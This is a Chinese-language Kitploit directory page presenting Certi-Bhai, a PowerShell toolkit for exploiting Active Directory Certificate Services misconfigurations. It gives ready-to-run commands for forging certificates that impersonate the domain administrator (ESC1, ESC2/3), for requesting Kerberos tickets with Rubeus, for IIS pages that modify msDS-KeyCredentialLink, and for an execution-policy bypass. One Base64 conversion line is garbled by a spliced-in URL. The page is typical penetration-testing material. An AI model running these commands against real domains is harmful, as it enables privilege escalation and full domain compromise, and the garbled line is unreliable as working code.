Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Certi-Bhai — AD CS 利用相关内容放在这里 | Kitploit
工具/GitHubGitHub/incredibleindishell/certi-bhai
权限提升Payload生成漏洞利用后渗透利用渗透测试身份验证红队
GitHubincredibleindishell/certi-bhai

Certi-Bhai

AD CS 利用相关内容放在这里

查看仓库
26255个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Certi-Bhai:AD CS 利用工具包

Certi-Bhai 是一个全面的 PowerShell 利用工具集合,用于攻击 Active Directory 证书服务(AD CS)漏洞。该工具包实现了多种提权场景(ESC),展示了 ADCS 环境中严重的安全配置错误。

📋 目录

  • 概述
  • 目录结构
  • 前提条件
  • 使用指南
    • ESC1 - 权限过宽的证书模板
    • ESC2/3 - 证书请求代理
    • ESC15 - 易受攻击的 Web 注册
    • CSR 生成
    • IIS 权限提升

🎯 概述

Active Directory 证书服务(AD CS)经常被错误配置,从而产生多种攻击向量。Certi-Bhai 提供了实用的利用脚本和工具,用于常见 ADCS 漏洞的安全测试和研究。

请负责任地使用,且仅在授权的测试环境中使用。


✅ 前提条件

  • Windows 7 / Windows Server 2008 或更高版本
  • PowerShell 3.0+
  • 已加入 Active Directory 域的系统
  • 请求证书的适当权限
  • 可访问 AD CS 基础设施
  • .NET Framework 3.5+(用于 ASP.NET 脚本)

所需模块

root@kitploit:~
# Active Directory 模块(可选,用于增强功能)
Import-Module ActiveDirectory

🚀 使用指南

ESC1:权限过宽的证书模板

漏洞:证书模板允许使用任意 SubjectAltName(SAN)值进行注册。

功能:通过权限过宽的模板创建证书,允许您冒充域中的任何用户或计算机。

用法:

root@kitploit:~
# 导航到 ESC1 目录
cd ESC1

# 运行利用脚本
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
           -templateName "vuln" `
           -altName "administrator" `
           -pfxPass "password123"

参数:

  • -subjectName:目标用户的完整可分辨名称(DN)
  • -templateName:易受攻击的证书模板名称
  • -altName:要请求的备用名称(用户名/计算机名)
  • -pfxPass:PFX 导出的密码

输出:Base64 编码的 PFX 证书,可与 Rubeus 等工具配合使用

视频教程:https://www.youtube.com/watch?v=l0gMw_mO4dw


ESC2/3:任意用途/证书请求代理滥用

漏洞:证书请求代理可以代表任何用户请求证书。

功能:以证书请求代理身份注册证书,然后为任意主体请求证书。

用法:

root@kitploit:~
# 导航到 ESC3 目录
cd ESC3

# 运行利用脚本
.
\esc3_working.ps1 -templateName "CEOTemplate" `
                   -target_user "administrator" `
                   -domain "INDISHELL" `
                   -pfxPass "password123"

参数:

  • -templateName:易受攻击的请求代理模板
  • -target_user:要为其请求证书的主体
  • -domain:域名
  • -pfxPass:PFX 密码

输出:管理员证书(PFX),Base64 编码

视频教程:https://www.youtube.com/watch?v=fGjrM-JKnoM


ESC15:配置错误的 Schema 版本 1 模板

漏洞:应用程序策略注入。


CSR 生成与管理

快速 CSR 生成

root@kitploit:~
cd CSR_Generate

# 生成证书签名请求
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
                -altName "admin"

向证书颁发机构提交 CSR

root@kitploit:~
# 向 CA 提交 CSR
.
\csr_submit.ps1 -csr $csr `
                 -templateName "User" `
                 -caServer "ca-server.domain.local"

IIS 权限提升

证书管理界面

cert.aspx Web 界面提供了一个用户友好的表单,用于从 AD CS RPC 端点请求证书:

root@kitploit:~
http://your-iis-server/cert.aspx

LDAP 更新界面

通过 Web 界面修改 LDAP 属性。此脚本主要用于在 msDS-KeyCredentialLink 属性中注入 blob:

root@kitploit:~
http://your-iis-server/ldap_update.aspx

功能:

  • LDAP 属性过滤
  • 对象修改能力
  • NT Authority\SYSTEM 上下文执行

快速参考命令

用于 ESC1 利用

root@kitploit:~
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
                -templateName "User" `
                -altName "administrator" `
                -pfxPass "P@ssw0rd!"

用于 ESC2/3 后期利用

root@kitploit:~
# 将 PFX 转换为 Rubeus 可用的格式
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)

使用 Rubeus 请求 TGT

root@kitploit:~
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap

🔧 故障排除

常见问题

问:脚本执行被阻止

root@kitploit:~
# 以管理员身份运行 PowerShell
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

问:找不到证书模板

  • 验证模板名称是否正确
  • 确保您拥有从该模板请求的权限
  • 检查证书颁发机构日志

问:LDAP 连接失败

  • 验证域连接
  • 检查凭据
  • 确认 ADSI 访问

📝 技术细节

证书请求流程

  1. 生成私钥(2048 位 RSA)
  2. 创建证书请求(PKCS#10)
  3. 设置主题名称和扩展
  4. 提交给证书颁发机构
  5. 检索已颁发的证书
  6. 导出为带密码的 PFX

🤝 贡献

发现问题或有改进建议?请负责任地报告。


下载工具